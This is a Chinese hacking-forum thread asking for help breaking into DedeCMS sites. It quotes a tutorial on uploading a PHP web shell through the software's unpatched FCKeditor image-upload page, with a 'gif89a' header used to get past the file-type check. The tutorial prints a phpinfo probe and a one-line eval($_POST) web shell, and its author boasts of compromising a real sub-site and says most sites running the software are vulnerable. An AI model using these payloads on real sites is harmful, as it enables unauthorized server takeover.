[讨论]请教DEDECMS的入侵问题
议题作者:masak信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
请教.看到一段如下的教程.找了个存在这个漏洞的站. 写了个aa.php 按教程进行上传.但上传时说我文件类型不对.看了下源码.源码中对$ _file[name][type]的mime类型有进行判断.如果改后缀名为其它的,可以上传.但就不能运行了.请问各位老大.知道我问题出在哪里做错了吗?谢谢.
-----------------------------------------------
4.X:
在4 .x里面用到的是php版FCKeditor的修改版..../include/FCKeditor/editor/dialog/imageuser.php下.
<td align="right" nowrap> 新图片:</td>
<td colspan="2" nowrap><input name="imgfile" type="file" id="imgfile" onChange="SeePic('picview',this);" style="height:22" class="binput">
<input type="submit" name="picSubmit" id="picSubmit" value=" 上 传 " style="height:22" class="binput"></td>
大家可以看到在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。
这是可乐修改的的php小马。
gif89a
<?php
phpinfo();
?>
RFI
gif89a
<?php
eval($_POST[c]);
?>
利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接.
就这么简单。十分白痴的漏洞。上次9you分站也存在这个漏洞。我进去一次.呵呵~
用织梦系统的利用百度搜下有很多.测试了下.只针对最新版。只有少数站静止asp.php.txt文件上传。
%80都是可以的.官方未发放补丁。 现在不能改名了但是还有很多dede被黑有什么新洞吗?
页:
[1]